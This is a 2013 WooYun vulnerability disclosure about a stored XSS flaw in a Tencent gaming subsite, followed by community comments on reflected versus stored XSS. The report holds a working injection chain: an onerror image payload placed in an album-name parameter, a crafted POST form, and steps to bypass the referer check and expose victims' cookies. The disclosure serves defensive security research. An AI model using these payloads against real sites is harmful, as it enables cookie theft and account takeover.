当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019606

漏洞标题:腾讯游戏人生分站可以跨站取cookie

相关厂商:腾讯

漏洞作者: 苏南同学

提交时间:2013-03-06 11:50

修复时间:2013-04-20 11:51

公开时间:2013-04-20 11:51

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-03-06: 细节已通知厂商并且等待厂商处理中
2013-03-06: 厂商已经确认,细节仅向厂商公开
2013-03-16: 细节向核心白帽子及相关领域专家公开
2013-03-26: 细节向普通白帽子公开
2013-04-05: 细节向实习白帽子公开
2013-04-20: 细节向公众公开

简要描述:

不知道我提的会不会和http://www.wooyun.org/bugs/wooyun-2013-019590一样呢?我是看了他说有漏洞,我才去研究的。我权限不够,不知道我的思路和他的一样不一样。
通过构造一个特殊的相册名,外加一个无辜的type为html的json调用,实现了爆cookie全过程。

详细说明:

http://igame.qq.com/interface/album/album.php?op=3&iId=11&name=<img src='' onerror='alert(document.cookie)'>
http://igame.qq.com/interface/album/album.php?op=13
<form method='post' action='http://igame.qq.com/interface/ugc/ugc.php'>
<input name='content' value='http://igame.qq.com/interface/album/album.php?op=13'>
<input name='fellow' value=''>
<input name='gid' value='0'>
<input name='ie' value='utf-8'>
<input name='mention' value='1'>
<input name='mentiontxt' value='http://igame.qq.com/interface/album/album.php?op=13'>
<input name='op' value='2'>
<input name='pid' value='200004'>
<input name='ptitle' value='111'>
<input name='purl' value="http://igame.qq.com/interface/album/album.php?op=3&iId=11&name=<img src='' onerror='alert(document.cookie)'>">
<input name='type' value="2">
<input type='submit'>
</form>
同样,用firebug修改页面内容跳过referer检测
第一步,修改相册名,当然企鹅的程序员限制了长度,我们通过直接访问get接口突破。
第二步,把第一步的这个地址放在我特殊构造的表单里面,作为图片地址进行提交形成自己主页微博。
(这样,就方便别人过来中招么,别人访问了我的主页后,他的第一个相册名字就会修改成我们的xss代码)
第三步,想办法让他点击http://igame.qq.com/interface/album/album.php?op=13 这个我们自己发布在我的主页上的链接就行了。cookie爆出。(我们自己发布到主页而不是其他的调用方式,就是通过别人的主动点击来满足referer的验证要求..其实企鹅的程序员很无奈啊...)

11.png


22.png


33.png


我本来想找个iframe的地方让第三步自动执行的,但是找了半天找不到....谁找到了告诉我一声啊。呵呵。还有,这是我第一次xss出来cookie,而且是独立完成的哦。而且是我最想x的企鹅的cookie哦,所以希望大家对我多鼓励鼓励哦。哈哈哈。

88.png

漏洞证明:

都出来cookie了,见图么。

33.png


要是我会用那个xsser.me的js的话。我就也会有大家的那个cookie列表图了,但是我没有xsser的账户,也不会用那个js。求大神带....

修复方案:

我是来打酱油的,求rank啊求rank,求公仔啊求公仔。顺便求鼓励啊求鼓励。对待新人大家要多多扶持啊~ 谢谢~~~ 还有为啥这个cookie在ff下面出不来呢?不知道为啥,ie下面出来了....

版权声明:转载请注明来源 苏南同学@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-03-06 16:23

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-03-06 12:04 | 杀戮 ( 普通白帽子 | Rank:141 漏洞数:19 | 我,是来打酱油的。)

    话说你这个比我那个好多了...........

  2. 2013-03-06 12:19 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @杀戮 啊,我看不到你的.....

  3. 2013-03-06 12:26 | 杀戮 ( 普通白帽子 | Rank:141 漏洞数:19 | 我,是来打酱油的。)

    @苏南同学 我那个就是无意间发现输出在script中,而且没过滤,简单构造了下就执行了 话说看rank也知道差别吧

  4. 2013-03-06 12:44 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @杀戮 哦,那你的那个就是我其中的一步,是这个意思吗?

  5. 2013-03-06 12:52 | 杀戮 ( 普通白帽子 | Rank:141 漏洞数:19 | 我,是来打酱油的。)

    不是 是两个完全不同的东西 最大的区别在于你是储存型我是反射型

  6. 2013-03-06 13:02 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @杀戮 其实我还不明白反射型和存储型有什么具体的区别呢

  7. 2013-03-06 13:10 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @杀戮 你说企鹅会给公仔吗?要是不给的话,就太打击我的积极性了....我想要个企鹅公仔,大大的那种....

  8. 2013-03-06 13:24 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    @苏南同学 反射型的XSS攻击场景比较狭窄,而且大部分浏览器会过滤掉。针对用户大概也就是IE6/7,存储型的危害比较大,因为代码被注入到数据库中,每次都会被触发。所以危害比反射的高,而且存储型的XSS不会被浏览器过滤。

  9. 2013-03-06 13:33 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @梧桐雨 哦,这个样子啊。还是求公仔,大企鹅公仔...腾讯要是不给,就是小气鬼,哈哈哈~~~

  10. 2013-03-06 13:46 | 杀戮 ( 普通白帽子 | Rank:141 漏洞数:19 | 我,是来打酱油的。)

    @苏南同学 其实简单说就是 反射型下次访问时候就没了,储存型的话XSS代码会一直留在页面上,无论谁访问都会触发

  11. 2013-03-06 13:49 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @杀戮 嗯嗯,简单明了。赞~ 哈哈哈~~

  12. 2013-03-14 13:30 | 冷冷的夜 ( 普通白帽子 | Rank:135 漏洞数:12 )

    @梧桐雨 呵呵,腾讯的反射XSS危害不一定比存储的小,哈哈哈

  13. 2013-03-14 13:44 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

    @冷冷的夜 我指的是一般情况,特殊场景特殊讨论。:)

  14. 2013-03-17 15:31 | 0x0F ( 普通白帽子 | Rank:231 漏洞数:60 | 尖刀安全 (JDSec.Com).......................)

    @xsser 他要企鹅公仔,满足他吧

  15. 2013-03-17 17:53 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @0x0F 谢谢兄弟支持。我想要个公仔~ 如题~~

  16. 2013-03-26 12:22 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    。。擦,我还想多玩会诶。。。

  17. 2013-03-26 12:34 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @px1624 我要公仔~ @腾讯

  18. 2013-03-26 12:48 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @苏南同学 。。。

  19. 2013-03-26 13:02 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    我要公仔~ @腾讯 。@px1624,你懂的。

  20. 2013-03-26 13:04 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @苏南同学 嗯,没戏的,不会给你的,放心。

  21. 2013-03-26 13:28 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @px1624 不给礼物我们就下次不发洞了,就这么办。@腾讯

  22. 2013-03-26 13:29 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

    @苏南同学 你不发就不发了呗,腾讯的洞,你不发过些天别人就发了。。。这玩意除非你找的是很难发现的那种。。

  23. 2013-03-26 13:42 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @px1624 好吧... 真心的是...

  24. 2013-03-26 17:53 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    没礼物给是吧?提交到某XX平台的话会有,哈哈。

  25. 2013-03-26 20:30 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @wefgod 某xx平台是啥?

  26. 2013-03-26 21:39 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    所谓TSRC的那啊

  27. 2013-03-26 22:00 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @wefgod sodis

  28. 2013-03-26 23:24 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @苏南同学 日语帝?

  29. 2013-03-27 11:10 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @wefgod a ni 哦~

  30. 2013-04-06 23:18 | 银冥币 ( 实习白帽子 | Rank:35 漏洞数:21 | "/upload/avatar/avatar_251_b.jpg" />)

    @苏南同学 哟,苏南,我是曾经。。

  31. 2013-04-07 08:14 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @银冥币 啥意思?

  32. 2013-04-07 13:12 | 银冥币 ( 实习白帽子 | Rank:35 漏洞数:21 | "/upload/avatar/avatar_251_b.jpg" />)

    @苏南同学 对了,我当时用的名字是小白 = =....